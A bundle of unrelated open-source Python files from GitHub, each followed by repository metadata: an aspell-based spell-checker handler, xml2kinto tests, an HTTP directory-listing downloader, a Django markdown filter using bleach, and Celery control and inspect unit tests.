"avg_line_length": 22.32894736842105,
"alnum_prop": 0.5586328815556865,
"repo_name": "lovelysystems/pyjamas",
"id": "1964ab226ab0d6b63cd5681404d0d4cfb9df3c9a",
"size": "1697",
"binary": false,
"copies": "2",
"ref": "refs/heads/ls-production",
"path": "examples/libtest/SetTest.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "JavaScript",
"bytes": "271093"
},
{
"name": "PHP",
"bytes": "121841"
},
{
"name": "Python",
"bytes": "1958339"
},
{
"name": "Shell",
"bytes": "9117"
}
],
"symlink_target": ""
} |
"""Request handler of the module."""
import copy
import aspell
import re
from ppp_datamodel import Sentence, Resource
from ppp_datamodel.communication import TraceItem, Response
from ppp_libmodule.exceptions import ClientError
class Word:
"""
A class to manipulate words.
"""
def __init__(self, string, beginOffset):
self.string = string
self.corrected = False
self.beginOffset = beginOffset
def __str__(self):
return "({0},{1},{2})".format(str(self.string), str(self.corrected), str(self.beginOffset))
def __eq__(self, other):
return self.__dict__ == other.__dict__
def copy(self):
return copy.deepcopy(self)
class StringCorrector:
"""
A class to perform spell checking.
A new instance of the object has to be created for each string.
"""
quotationRegexp = '|'.join(r'{0}(?:\.|[^{0}{1}\\])*{1}'.format(quote[0], quote[1])
for quote in ['""', '“”', '‘’', '«»']
)
def __init__(self, language):
self.numberCorrections = 0
self.numberWords = 0
self.speller = aspell.Speller('lang', language)
self.quotations = set()
def correct(self, w):
"""
Take in input a word.
Return the corrected word (unchanged if it was already correct).
"""
if w.beginOffset in self.quotations:
return w
if self.speller.check(w.string):
return w
if w.string.isdecimal():
return w
else:
self.numberCorrections += 1
w.string = self.speller.suggest(w.string)[0]
w.corrected = True
return w
def correctList(self, wordList):
"""
Take in input a list of words.
Return the list of correct words.
"""
return [self.correct(w) for w in wordList]
def tokenize(self, s):
"""
Returns the list of the words in s.
"""
wordList = re.findall(r"[\w']+", s)
result = []
wordId = 0
for i in range(0, len(wordList)):
newId = s.index(wordList[i])
wordId += newId
result.append(Word(wordList[i], wordId))
wordId += len(wordList[i])
s=s[newId+len(wordList[i]):]
return result
def quotationTraversal(self, s):
"""
Fill the quotation set.
"""
for quote in re.finditer(self.quotationRegexp, s):
self.quotations = self.quotations.union(range(quote.start(), quote.end()))
def correctString(self, s):
"""
Return the corrected string.
"""
wordList = self.tokenize(s)
self.numberWords = len(wordList)
self.quotationTraversal(s)
correctedList = self.correctList([w.copy() for w in wordList])
result = ""
oldId = 0
for i in range(0, len(correctedList)):
result += s[oldId:correctedList[i].beginOffset]
result += correctedList[i].string
oldId = correctedList[i].beginOffset+len(wordList[i].string)
result += s[oldId:len(s)]
return result
class RequestHandler:
def __init__(self, request):
self.request = request
def answer(self):
if not isinstance(self.request.tree, Sentence):
return []
corrector = StringCorrector(self.request.language)
result = corrector.correctString(self.request.tree.value)
if corrector.numberCorrections == 0:
return []
outputTree = Sentence(result)
relevance = self.request.measures.get('relevance', 0) + corrector.numberCorrections/corrector.numberWords
meas = {'accuracy': 0.5, 'relevance': relevance}
trace = self.request.trace + [TraceItem('spell-checker', outputTree, meas)]
response = Response(language=self.request.language, tree=outputTree, measures=meas, trace=trace)
return [response]
| {
"content_hash": "7a4a4a658d8de57131dd81281840ff66",
"timestamp": "",
"source": "github",
"line_count": 121,
"max_line_length": 113,
"avg_line_length": 32.90909090909091,
"alnum_prop": 0.5768458061275741,
"repo_name": "ProjetPP/PPP-Spell-Checker",
"id": "30e97ee914d518a1a9afea65a69c9329847bfc34",
"size": "3992",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "ppp_spell_checker/requesthandler.py",
"mode": "33188",
"license": "mit",
"language": [
{
"name": "Makefile",
"bytes": "228"
},
{
"name": "Python",
"bytes": "11710"
},
{
"name": "Shell",
"bytes": "179"
}
],
"symlink_target": ""
} |
import mock
from xml2kinto.kinto import get_kinto_records
def test_get_kinto_records_try_to_create_the_bucket():
kinto_client = mock.MagicMock()
kinto_client.create_collection.return_value.status_code = 201
get_kinto_records(kinto_client, mock.sentinel.bucket,
mock.sentinel.collection, mock.sentinel.permissions)
kinto_client.create_bucket.assert_called_with(mock.sentinel.bucket,
if_not_exists=True)
def test_get_kinto_records_try_to_create_the_collection_with_permissions():
kinto_client = mock.MagicMock()
kinto_client.create_collection.return_value.status_code = 201
get_kinto_records(kinto_client, mock.sentinel.bucket,
mock.sentinel.collection, mock.sentinel.permissions)
kinto_client.create_collection.assert_called_with(
mock.sentinel.collection, mock.sentinel.bucket,
permissions=mock.sentinel.permissions, if_not_exists=True)
def test_get_kinto_records_gets_a_list_of_records():
kinto_client = mock.MagicMock()
kinto_client.create_collection.return_value.status_code = 201
get_kinto_records(kinto_client, mock.sentinel.bucket,
mock.sentinel.collection, mock.sentinel.permissions)
kinto_client.get_records.assert_called_with(
bucket=mock.sentinel.bucket, collection=mock.sentinel.collection)
def test_get_kinto_records_try_to_create_the_collection_with_schema():
kinto_client = mock.MagicMock()
kinto_client.create_collection.return_value.status_code = 201
kinto_client.create_collection.return_value.json.return_value = {
"data": {
"schema": {}
}
}
get_kinto_records(kinto_client,
mock.sentinel.bucket,
mock.sentinel.collection,
mock.sentinel.permissions,
schema={'foo': 'bar'})
kinto_client.patch_collection.assert_called_with(
bucket=mock.sentinel.bucket,
collection=mock.sentinel.collection,
data={"schema": {"foo": "bar"}})
def test_get_kinto_records_try_to_update_the_collection_schema():
kinto_client = mock.MagicMock()
kinto_client.create_collection.return_value = {
"details": {
"existing": {
"schema": {}
}
}
}
get_kinto_records(kinto_client,
mock.sentinel.bucket,
mock.sentinel.collection,
mock.sentinel.permissions,
schema={'foo': 'bar'})
kinto_client.patch_collection.assert_called_with(
bucket=mock.sentinel.bucket,
collection=mock.sentinel.collection,
data={"schema": {"foo": "bar"}})
def test_get_kinto_records_does_not_update_the_collection_schema_if_right():
kinto_client = mock.MagicMock()
kinto_client.create_collection.return_value = {
"details": {
"existing": {
"schema": {"foo": "bar"}
}
}
}
get_kinto_records(kinto_client,
mock.sentinel.bucket,
mock.sentinel.collection,
mock.sentinel.permissions,
schema={'foo': 'bar'})
assert not kinto_client.patch_collection.called
def test_get_kinto_records_does_update_if_it_has_created_it():
kinto_client = mock.MagicMock()
kinto_client.create_collection.return_value = {
"data": {
"schema": {}
}
}
get_kinto_records(kinto_client,
mock.sentinel.bucket,
mock.sentinel.collection,
mock.sentinel.permissions,
schema={'foo': 'bar'})
assert kinto_client.patch_collection.called
| {
"content_hash": "b9c0d2874d15be038434b165127006ae",
"timestamp": "",
"source": "github",
"line_count": 108,
"max_line_length": 76,
"avg_line_length": 35.25925925925926,
"alnum_prop": 0.6016281512605042,
"repo_name": "mozilla-services/xml2kinto",
"id": "3539bdb94f4caa3d87b9396d0073f7bbc3ec7cee",
"size": "3808",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "xml2kinto/tests/test_kinto.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "HTML",
"bytes": "19766"
},
{
"name": "Makefile",
"bytes": "2304"
},
{
"name": "Python",
"bytes": "47294"
}
],
"symlink_target": ""
} |
from __future__ import division
from HTMLParser import HTMLParser
import os
import re
from .https_if_available import build_opener
re_url = re.compile(r'^(([a-zA-Z_-]+)://([^/]+))(/.*)?$')
def resolve_link(link, url):
m = re_url.match(link)
if m is not None:
if not m.group(4):
# http://domain -> http://domain/
return link + '/'
else:
return link
elif link[0] == '/':
# /some/path
murl = re_url.match(url)
return murl.group(1) + link
else:
# relative/path
if url[-1] == '/':
return url + link
else:
return url + '/' + link
class ListingParser(HTMLParser):
"""Parses an HTML file and build a list of links.
Links are stored into the 'links' set. They are resolved into absolute
links.
"""
def __init__(self, url):
HTMLParser.__init__(self)
if url[-1] != '/':
url += '/'
self.__url = url
self.links = set()
def handle_starttag(self, tag, attrs):
if tag == 'a':
for key, value in attrs:
if key == 'href':
if not value:
continue
value = resolve_link(value, self.__url)
self.links.add(value)
break
def download_directory(url, target, insecure=False):
def mkdir():
if not mkdir.done:
try:
os.mkdir(target)
except OSError:
pass
mkdir.done = True
mkdir.done = False
opener = build_opener(insecure=insecure)
response = opener.open(url)
if response.info().type == 'text/html':
contents = response.read()
parser = ListingParser(url)
parser.feed(contents)
for link in parser.links:
link = resolve_link(link, url)
if link[-1] == '/':
link = link[:-1]
if not link.startswith(url):
continue
name = link.rsplit('/', 1)[1]
if '?' in name:
continue
mkdir()
download_directory(link, os.path.join(target, name), insecure)
if not mkdir.done:
# We didn't find anything to write inside this directory
# Maybe it's a HTML file?
if url[-1] != '/':
end = target[-5:].lower()
if not (end.endswith('.htm') or end.endswith('.html')):
target = target + '.html'
with open(target, 'wb') as fp:
fp.write(contents)
else:
buffer_size = 4096
with open(target, 'wb') as fp:
chunk = response.read(buffer_size)
while chunk:
fp.write(chunk)
chunk = response.read(buffer_size)
###############################################################################
import unittest
class TestLinkResolution(unittest.TestCase):
def test_absolute_link(self):
self.assertEqual(
resolve_link('http://website.org/p/test.txt',
'http://some/other/url'),
'http://website.org/p/test.txt')
self.assertEqual(
resolve_link('http://website.org',
'http://some/other/url'),
'http://website.org/')
def test_absolute_path(self):
self.assertEqual(
resolve_link('/p/test.txt', 'http://some/url'),
'http://some/p/test.txt')
self.assertEqual(
resolve_link('/p/test.txt', 'http://some/url/'),
'http://some/p/test.txt')
self.assertEqual(
resolve_link('/p/test.txt', 'http://site'),
'http://site/p/test.txt')
self.assertEqual(
resolve_link('/p/test.txt', 'http://site/'),
'http://site/p/test.txt')
def test_relative_path(self):
self.assertEqual(
resolve_link('some/file', 'http://site/folder'),
'http://site/folder/some/file')
self.assertEqual(
resolve_link('some/file', 'http://site/folder/'),
'http://site/folder/some/file')
self.assertEqual(
resolve_link('some/dir/', 'http://site/folder'),
'http://site/folder/some/dir/')
class TestParser(unittest.TestCase):
def test_parse(self):
parser = ListingParser('http://a.remram.fr/test')
parser.feed("""
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 3.2 Final//EN"><html><head><title>
Index of /test</title></head><body><h1>Index of /test</h1><table><tr><th>
<img src="/icons/blank.gif" alt="[ICO]"></th><th><a href="?C=N;O=D">Name</a>
</th><th><a href="?C=M;O=A">Last modified</a></th><th><a href="?C=S;O=A">Size
</a></th><th><a href="?C=D;O=A">Description</a></th></tr><tr><th colspan="5">
<hr></th></tr><tr><td valign="top"><img src="/icons/back.gif" alt="[DIR]"></td>
<td><a href="/">Parent Directory</a></td><td> </td><td align="right"> -
</td><td> </td></tr><tr><td valign="top">
<img src="/icons/unknown.gif" alt="[ ]"></td><td><a href="a">a</a></td>
<td align="right">11-Sep-2013 15:46 </td><td align="right"> 3 </td><td>
</td></tr><tr><td valign="top"><img src="/icons/unknown.gif" alt="[ ]"></td>
<td><a href="/bb">bb</a></td><td align="right">11-Sep-2013 15:46 </td>
<td align="right"> 3 </td><td> </td></tr><tr><td valign="top">
<img src="/icons/folder.gif" alt="[DIR]"></td><td><a href="/cc/">cc/</a></td>
<td align="right">11-Sep-2013 15:46 </td><td align="right"> - </td><td>
</td></tr><tr><td valign="top"><img src="/icons/folder.gif" alt="[DIR]"></td>
<td><a href="http://a.remram.fr/dd">dd/</a></td><td align="right">
11-Sep-2013 15:46 </td><td align="right"> - </td><td> </td></tr><tr>
<th colspan="5"><hr></th></tr></table></body></html>
""")
links = set(l for l in parser.links if '?' not in l)
self.assertEqual(links, set([
'http://a.remram.fr/',
'http://a.remram.fr/test/a',
'http://a.remram.fr/bb',
'http://a.remram.fr/cc/',
'http://a.remram.fr/dd',
]))
| {
"content_hash": "c22d8089d1ef3aa72dfca60fe1f4ba57",
"timestamp": "",
"source": "github",
"line_count": 177,
"max_line_length": 79,
"avg_line_length": 35.559322033898304,
"alnum_prop": 0.4974578964092787,
"repo_name": "VisTrails/VisTrails",
"id": "18b8d50899749d349fe8cba314739d62a49fcaa8",
"size": "8252",
"binary": false,
"copies": "2",
"ref": "refs/heads/v2.2",
"path": "vistrails/packages/URL/http_directory.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "Batchfile",
"bytes": "1129"
},
{
"name": "Makefile",
"bytes": "768"
},
{
"name": "Mako",
"bytes": "66613"
},
{
"name": "PHP",
"bytes": "49302"
},
{
"name": "Python",
"bytes": "19779006"
},
{
"name": "R",
"bytes": "782836"
},
{
"name": "Ruby",
"bytes": "875"
},
{
"name": "SQLPL",
"bytes": "2323"
},
{
"name": "Shell",
"bytes": "26542"
},
{
"name": "TeX",
"bytes": "147247"
},
{
"name": "XSLT",
"bytes": "1090"
}
],
"symlink_target": ""
} |
from .baselines import (
mean_on_fold,
random_on_fold,
xu_et_al_on_fold,
doench_on_fold,
sgrna_from_doench_on_fold,
SVC_on_fold,
)
from .ensembles import (
spearman_scoring,
adaboost_on_fold,
LASSOs_ensemble_on_fold,
randomforest_on_fold,
decisiontree_on_fold,
linear_stacking,
pairwise_majority_voting,
median,
GBR_stacking,
GP_stacking,
SVM_stacking,
)
from .regression import (
ARDRegression_on_fold,
train_linreg_model,
logreg_on_fold,
linreg_on_fold,
feature_select,
get_weights,
set_up_inner_folds,
)
from .ssk import weighted_degree_kxx, WD_K
| {
"content_hash": "119945889c5639f3ae071ebc64cc5554",
"timestamp": "",
"source": "github",
"line_count": 31,
"max_line_length": 42,
"avg_line_length": 20.838709677419356,
"alnum_prop": 0.6547987616099071,
"repo_name": "pablocarderam/genetargeter",
"id": "61309e002081f50c544ecb8af0571db799f50edd",
"size": "706",
"binary": false,
"copies": "1",
"ref": "refs/heads/python3",
"path": "gRNAScores/azimuth/models/__init__.py",
"mode": "33261",
"license": "mit",
"language": [
{
"name": "C++",
"bytes": "16396"
},
{
"name": "CSS",
"bytes": "7323"
},
{
"name": "HTML",
"bytes": "27988"
},
{
"name": "JavaScript",
"bytes": "412639"
},
{
"name": "Procfile",
"bytes": "21"
},
{
"name": "Python",
"bytes": "551082"
}
],
"symlink_target": ""
} |
"""Markdown template filter."""
from django import template
from django.utils.safestring import mark_safe
import bleach
import markdown as markdown_
register = template.Library()
ADDITIONAL_TAGS = ['p', 'br', 'pre']
@register.filter(name='markdown')
def markdown_filter(value):
"""Convert markdown value to html."""
if value.count('<') > 5:
# Assume this is HTML and not markdown
rendered_html = value
else:
rendered_html = markdown_.markdown(value)
bleached_html = bleach.clean(rendered_html, tags=bleach.ALLOWED_TAGS + ADDITIONAL_TAGS, strip=True)
return mark_safe(bleached_html)
| {
"content_hash": "7eaef0b62295b3f13d3b1142b226cf21",
"timestamp": "",
"source": "github",
"line_count": 23,
"max_line_length": 103,
"avg_line_length": 27.47826086956522,
"alnum_prop": 0.6962025316455697,
"repo_name": "ScorpionResponse/freelancefinder",
"id": "ba4c9d13ffb60d6f4008af55d655da1f2046cd57",
"size": "632",
"binary": false,
"copies": "1",
"ref": "refs/heads/master",
"path": "freelancefinder/freelancefinder/templatetags/markdown_filter.py",
"mode": "33188",
"license": "bsd-3-clause",
"language": [
{
"name": "CSS",
"bytes": "78142"
},
{
"name": "HTML",
"bytes": "64094"
},
{
"name": "JavaScript",
"bytes": "15641"
},
{
"name": "Makefile",
"bytes": "2402"
},
{
"name": "Python",
"bytes": "366512"
}
],
"symlink_target": ""
} |
from __future__ import absolute_import, unicode_literals
import pytest
from case import Mock
from celery import uuid
from celery.app import control
from celery.exceptions import DuplicateNodenameWarning
from celery.five import items
from celery.utils.collections import LimitedSet
def _info_for_commandclass(type_):
from celery.worker.control import Panel
return [
(name, info)
for name, info in items(Panel.meta)
if info.type == type_
]
def test_client_implements_all_commands(app):
commands = _info_for_commandclass('control')
assert commands
for name, info in commands:
assert getattr(app.control, name)
def test_inspect_implements_all_commands(app):
inspect = app.control.inspect()
commands = _info_for_commandclass('inspect')
assert commands
for name, info in commands:
if info.type == 'inspect':
assert getattr(inspect, name)
class test_flatten_reply:
def test_flatten_reply(self):
reply = [
{'foo@example.com': {'hello': 10}},
{'foo@example.com': {'hello': 20}},
{'bar@example.com': {'hello': 30}}
]
with pytest.warns(DuplicateNodenameWarning) as w:
nodes = control.flatten_reply(reply)
assert 'Received multiple replies from node name: {0}.'.format(
next(iter(reply[0]))) in str(w[0].message.args[0])
assert 'foo@example.com' in nodes
assert 'bar@example.com' in nodes
class test_inspect:
def setup(self):
self.app.control.broadcast = Mock(name='broadcast')
self.app.control.broadcast.return_value = {}
self.inspect = self.app.control.inspect()
def test_prepare_reply(self):
reply = self.inspect._prepare([
{'w1': {'ok': 1}},
{'w2': {'ok': 1}},
])
assert reply == {
'w1': {'ok': 1},
'w2': {'ok': 1},
}
i = self.app.control.inspect(destination='w1')
assert i._prepare([{'w1': {'ok': 1}}]) == {'ok': 1}
def assert_broadcast_called(self, command,
destination=None,
callback=None,
connection=None,
limit=None,
timeout=None,
reply=True,
**arguments):
self.app.control.broadcast.assert_called_with(
command,
arguments=arguments,
destination=destination or self.inspect.destination,
callback=callback or self.inspect.callback,
connection=connection or self.inspect.connection,
limit=limit if limit is not None else self.inspect.limit,
timeout=timeout if timeout is not None else self.inspect.timeout,
reply=reply,
)
def test_active(self):
self.inspect.active()
self.assert_broadcast_called('active')
def test_clock(self):
self.inspect.clock()
self.assert_broadcast_called('clock')
def test_conf(self):
self.inspect.conf()
self.assert_broadcast_called('conf', with_defaults=False)
def test_conf__with_defaults(self):
self.inspect.conf(with_defaults=True)
self.assert_broadcast_called('conf', with_defaults=True)
def test_hello(self):
self.inspect.hello('george@vandelay.com')
self.assert_broadcast_called(
'hello', from_node='george@vandelay.com', revoked=None)
def test_hello__with_revoked(self):
revoked = LimitedSet(100)
for i in range(100):
revoked.add('id{0}'.format(i))
self.inspect.hello('george@vandelay.com', revoked=revoked._data)
self.assert_broadcast_called(
'hello', from_node='george@vandelay.com', revoked=revoked._data)
def test_memsample(self):
self.inspect.memsample()
self.assert_broadcast_called('memsample')
def test_memdump(self):
self.inspect.memdump()
self.assert_broadcast_called('memdump', samples=10)
def test_memdump__samples_specified(self):
self.inspect.memdump(samples=303)
self.assert_broadcast_called('memdump', samples=303)
def test_objgraph(self):
self.inspect.objgraph()
self.assert_broadcast_called(
'objgraph', num=200, type='Request', max_depth=10)
def test_scheduled(self):
self.inspect.scheduled()
self.assert_broadcast_called('scheduled')
def test_reserved(self):
self.inspect.reserved()
self.assert_broadcast_called('reserved')
def test_stats(self):
self.inspect.stats()
self.assert_broadcast_called('stats')
def test_revoked(self):
self.inspect.revoked()
self.assert_broadcast_called('revoked')
def test_registered(self):
self.inspect.registered()
self.assert_broadcast_called('registered', taskinfoitems=())
def test_registered__taskinfoitems(self):
self.inspect.registered('rate_limit', 'time_limit')
self.assert_broadcast_called(
'registered',
taskinfoitems=('rate_limit', 'time_limit'),
)
def test_ping(self):
self.inspect.ping()
self.assert_broadcast_called('ping')
def test_active_queues(self):
self.inspect.active_queues()
self.assert_broadcast_called('active_queues')
def test_query_task(self):
self.inspect.query_task('foo', 'bar')
self.assert_broadcast_called('query_task', ids=('foo', 'bar'))
def test_query_task__compat_single_list_argument(self):
self.inspect.query_task(['foo', 'bar'])
self.assert_broadcast_called('query_task', ids=['foo', 'bar'])
def test_query_task__scalar(self):
self.inspect.query_task('foo')
self.assert_broadcast_called('query_task', ids=('foo',))
def test_report(self):
self.inspect.report()
self.assert_broadcast_called('report')
class test_Control_broadcast:
def setup(self):
self.app.control.mailbox = Mock(name='mailbox')
def test_broadcast(self):
self.app.control.broadcast('foobarbaz', arguments={'foo': 2})
self.app.control.mailbox.assert_called()
self.app.control.mailbox()._broadcast.assert_called_with(
'foobarbaz', {'foo': 2}, None, False, 1.0, None, None,
channel=None,
)
def test_broadcast_limit(self):
self.app.control.broadcast(
'foobarbaz1', arguments=None, limit=None, destination=[1, 2, 3],
)
self.app.control.mailbox.assert_called()
self.app.control.mailbox()._broadcast.assert_called_with(
'foobarbaz1', {}, [1, 2, 3], False, 1.0, None, None,
channel=None,
)
class test_Control:
def setup(self):
self.app.control.broadcast = Mock(name='broadcast')
self.app.control.broadcast.return_value = {}
@self.app.task(shared=False)
def mytask():
pass
self.mytask = mytask
def assert_control_called_with_args(self, name, destination=None,
_options=None, **args):
self.app.control.broadcast.assert_called_with(
name, destination=destination, arguments=args, **_options or {})
def test_purge(self):
self.app.amqp.TaskConsumer = Mock(name='TaskConsumer')
self.app.control.purge()
self.app.amqp.TaskConsumer().purge.assert_called_with()
def test_rate_limit(self):
self.app.control.rate_limit(self.mytask.name, '100/m')
self.assert_control_called_with_args(
'rate_limit',
destination=None,
task_name=self.mytask.name,
rate_limit='100/m',
)
def test_rate_limit__with_destination(self):
self.app.control.rate_limit(
self.mytask.name, '100/m', 'a@w.com', limit=100)
self.assert_control_called_with_args(
'rate_limit',
destination='a@w.com',
task_name=self.mytask.name,
rate_limit='100/m',
_options={'limit': 100},
)
def test_time_limit(self):
self.app.control.time_limit(self.mytask.name, soft=10, hard=20)
self.assert_control_called_with_args(
'time_limit',
destination=None,
task_name=self.mytask.name,
soft=10,
hard=20,
)
def test_time_limit__with_destination(self):
self.app.control.time_limit(
self.mytask.name, soft=10, hard=20,
destination='a@q.com', limit=99,
)
self.assert_control_called_with_args(
'time_limit',
destination='a@q.com',
task_name=self.mytask.name,
soft=10,
hard=20,
_options={'limit': 99},
)
def test_add_consumer(self):
self.app.control.add_consumer('foo')
self.assert_control_called_with_args(
'add_consumer',
destination=None,
queue='foo',
exchange=None,
exchange_type='direct',
routing_key=None,
)
def test_add_consumer__with_options_and_dest(self):
self.app.control.add_consumer(
'foo', 'ex', 'topic', 'rkey', destination='a@q.com', limit=78)
self.assert_control_called_with_args(
'add_consumer',
destination='a@q.com',
queue='foo',
exchange='ex',
exchange_type='topic',
routing_key='rkey',
_options={'limit': 78},
)
def test_cancel_consumer(self):
self.app.control.cancel_consumer('foo')
self.assert_control_called_with_args(
'cancel_consumer',
destination=None,
queue='foo',
)
def test_cancel_consumer__with_destination(self):
self.app.control.cancel_consumer(
'foo', destination='w1@q.com', limit=3)
self.assert_control_called_with_args(
'cancel_consumer',
destination='w1@q.com',
queue='foo',
_options={'limit': 3},
)
def test_shutdown(self):
self.app.control.shutdown()
self.assert_control_called_with_args('shutdown', destination=None)
def test_shutdown__with_destination(self):
self.app.control.shutdown(destination='a@q.com', limit=3)
self.assert_control_called_with_args(
'shutdown', destination='a@q.com', _options={'limit': 3})
def test_heartbeat(self):
self.app.control.heartbeat()
self.assert_control_called_with_args('heartbeat', destination=None)
def test_heartbeat__with_destination(self):
self.app.control.heartbeat(destination='a@q.com', limit=3)
self.assert_control_called_with_args(
'heartbeat', destination='a@q.com', _options={'limit': 3})
def test_pool_restart(self):
self.app.control.pool_restart()
self.assert_control_called_with_args(
'pool_restart',
destination=None,
modules=None,
reload=False,
reloader=None)
def test_terminate(self):
self.app.control.revoke = Mock(name='revoke')
self.app.control.terminate('124')
self.app.control.revoke.assert_called_with(
'124', destination=None,
terminate=True,
signal=control.TERM_SIGNAME,
)
def test_enable_events(self):
self.app.control.enable_events()
self.assert_control_called_with_args('enable_events', destination=None)
def test_enable_events_with_destination(self):
self.app.control.enable_events(destination='a@q.com', limit=3)
self.assert_control_called_with_args(
'enable_events', destination='a@q.com', _options={'limit': 3})
def test_disable_events(self):
self.app.control.disable_events()
self.assert_control_called_with_args(
'disable_events', destination=None)
def test_disable_events_with_destination(self):
self.app.control.disable_events(destination='a@q.com', limit=3)
self.assert_control_called_with_args(
'disable_events', destination='a@q.com', _options={'limit': 3})
def test_ping(self):
self.app.control.ping()
self.assert_control_called_with_args(
'ping', destination=None,
_options={'timeout': 1.0, 'reply': True})
def test_ping_with_destination(self):
self.app.control.ping(destination='a@q.com', limit=3)
self.assert_control_called_with_args(
'ping',
destination='a@q.com',
_options={
'limit': 3,
'timeout': 1.0,
'reply': True,
})
def test_revoke(self):
self.app.control.revoke('foozbaaz')
self.assert_control_called_with_args(
'revoke',
destination=None,
task_id='foozbaaz',
signal=control.TERM_SIGNAME,
terminate=False,
)
def test_revoke__with_options(self):
self.app.control.revoke(
'foozbaaz',
destination='a@q.com',
terminate=True,
signal='KILL',
limit=404,
)
self.assert_control_called_with_args(
'revoke',
destination='a@q.com',
task_id='foozbaaz',
signal='KILL',
terminate=True,
_options={'limit': 404},
)
def test_election(self):
self.app.control.election('some_id', 'topic', 'action')
self.assert_control_called_with_args(
'election',
destination=None,
topic='topic',
action='action',
id='some_id',
_options={'connection': None},
)
def test_autoscale(self):
self.app.control.autoscale(300, 10)
self.assert_control_called_with_args(
'autoscale', max=300, min=10, destination=None)
def test_autoscale__with_options(self):
self.app.control.autoscale(300, 10, destination='a@q.com', limit=39)
self.assert_control_called_with_args(
'autoscale', max=300, min=10,
destination='a@q.com',
_options={'limit': 39}
)
def test_pool_grow(self):
self.app.control.pool_grow(2)
self.assert_control_called_with_args(
'pool_grow', n=2, destination=None)
def test_pool_grow__with_options(self):
self.app.control.pool_grow(2, destination='a@q.com', limit=39)
self.assert_control_called_with_args(
'pool_grow', n=2,
destination='a@q.com',
_options={'limit': 39}
)
def test_pool_shrink(self):
self.app.control.pool_shrink(2)
self.assert_control_called_with_args(
'pool_shrink', n=2, destination=None)
def test_pool_shrink__with_options(self):
self.app.control.pool_shrink(2, destination='a@q.com', limit=39)
self.assert_control_called_with_args(
'pool_shrink', n=2,
destination='a@q.com',
_options={'limit': 39}
)
def test_revoke_from_result(self):
self.app.control.revoke = Mock(name='revoke')
self.app.AsyncResult('foozbazzbar').revoke()
self.app.control.revoke.assert_called_with(
'foozbazzbar',
connection=None, reply=False, signal=None,
terminate=False, timeout=None)
def test_revoke_from_resultset(self):
self.app.control.revoke = Mock(name='revoke')
uuids = [uuid() for _ in range(10)]
r = self.app.GroupResult(
uuid(), [self.app.AsyncResult(x) for x in uuids])
r.revoke()
self.app.control.revoke.assert_called_with(
uuids,
connection=None, reply=False, signal=None,
terminate=False, timeout=None)
def test_after_fork_clears_mailbox_pool(self):
amqp = Mock(name='amqp')
self.app.amqp = amqp
closed_pool = Mock(name='closed pool')
amqp.producer_pool = closed_pool
assert closed_pool is self.app.control.mailbox.producer_pool
self.app.control._after_fork()
new_pool = Mock(name='new pool')
amqp.producer_pool = new_pool
assert new_pool is self.app.control.mailbox.producer_pool
| {
"content_hash": "ca4d0a23d30197db64cbfbd9d20b4556",
"timestamp": "",
"source": "github",
"line_count": 500,
"max_line_length": 79,
"avg_line_length": 33.104,
"alnum_prop": 0.5776945384243596,
"repo_name": "kawamon/hue",
"id": "6406590b7e50b20cb014baf15ad747de83e7f82a",
"size": "16552",
"binary": false,
"copies": "2",
"ref": "refs/heads/master",
"path": "desktop/core/ext-py/celery-4.2.1/t/unit/app/test_control.py",
"mode": "33188",
"license": "apache-2.0",
"language": [
{
"name": "ABAP",
"bytes": "962"
},
{
"name": "ActionScript",
"bytes": "1133"
},
{
"name": "Ada",
"bytes": "99"
},
{
"name": "Assembly",
"bytes": "5786"
},
{
"name": "AutoHotkey",
"bytes": "720"
},
{
"name": "Batchfile",
"bytes": "118907"
},
{
"name": "C",
"bytes": "3196521"
},
{
"name": "C#",
"bytes": "83"
},
{
"name": "C++",
"bytes": "308860"
},
{
"name": "COBOL",
"bytes": "4"
},
{
"name": "CSS",
"bytes": "1050129"
},
{
"name": "Cirru",
"bytes": "520"
},
{
"name": "Clojure",
"bytes": "794"
},
{
"name": "CoffeeScript",
"bytes": "403"
},
{
"name": "ColdFusion",
"bytes": "86"
},
{
"name": "Common Lisp",
"bytes": "632"
},
{
"name": "D",
"bytes": "324"
},
{
"name": "Dart",
"bytes": "489"
},
{
"name": "Dockerfile",
"bytes": "10981"
},
{
"name": "Eiffel",
"bytes": "375"
},
{
"name": "Elixir",
"bytes": "692"
},
{
"name": "Elm",
"bytes": "487"
},
{
"name": "Emacs Lisp",
"bytes": "411907"
},
{
"name": "Erlang",
"bytes": "487"
},
{
"name": "Forth",
"bytes": "979"
},
{
"name": "FreeMarker",
"bytes": "1017"
},
{
"name": "G-code",
"bytes": "521"
},
{
"name": "GLSL",
"bytes": "512"
},
{
"name": "Genshi",
"bytes": "946"
},
{
"name": "Gherkin",
"bytes": "699"
},
{
"name": "Go",
"bytes": "7312"
},
{
"name": "Groovy",
"bytes": "1080"
},
{
"name": "HTML",
"bytes": "24999718"
},
{
"name": "Haskell",
"bytes": "512"
},
{
"name": "Haxe",
"bytes": "447"
},
{
"name": "HiveQL",
"bytes": "43"
},
{
"name": "Io",
"bytes": "140"
},
{
"name": "JSONiq",
"bytes": "4"
},
{
"name": "Java",
"bytes": "471854"
},
{
"name": "JavaScript",
"bytes": "28075556"
},
{
"name": "Julia",
"bytes": "210"
},
{
"name": "Jupyter Notebook",
"bytes": "73168"
},
{
"name": "LSL",
"bytes": "2080"
},
{
"name": "Lean",
"bytes": "213"
},
{
"name": "Lex",
"bytes": "264449"
},
{
"name": "Liquid",
"bytes": "1883"
},
{
"name": "LiveScript",
"bytes": "5747"
},
{
"name": "Lua",
"bytes": "78382"
},
{
"name": "M4",
"bytes": "1377"
},
{
"name": "MATLAB",
"bytes": "203"
},
{
"name": "Makefile",
"bytes": "269655"
},
{
"name": "Mako",
"bytes": "3614942"
},
{
"name": "Mask",
"bytes": "597"
},
{
"name": "Myghty",
"bytes": "936"
},
{
"name": "Nix",
"bytes": "2212"
},
{
"name": "OCaml",
"bytes": "539"
},
{
"name": "Objective-C",
"bytes": "2672"
},
{
"name": "OpenSCAD",
"bytes": "333"
},
{
"name": "PHP",
"bytes": "662"
},
{
"name": "PLSQL",
"bytes": "31565"
},
{
"name": "PLpgSQL",
"bytes": "6006"
},
{
"name": "Pascal",
"bytes": "1412"
},
{
"name": "Perl",
"bytes": "4327"
},
{
"name": "PigLatin",
"bytes": "371"
},
{
"name": "PowerShell",
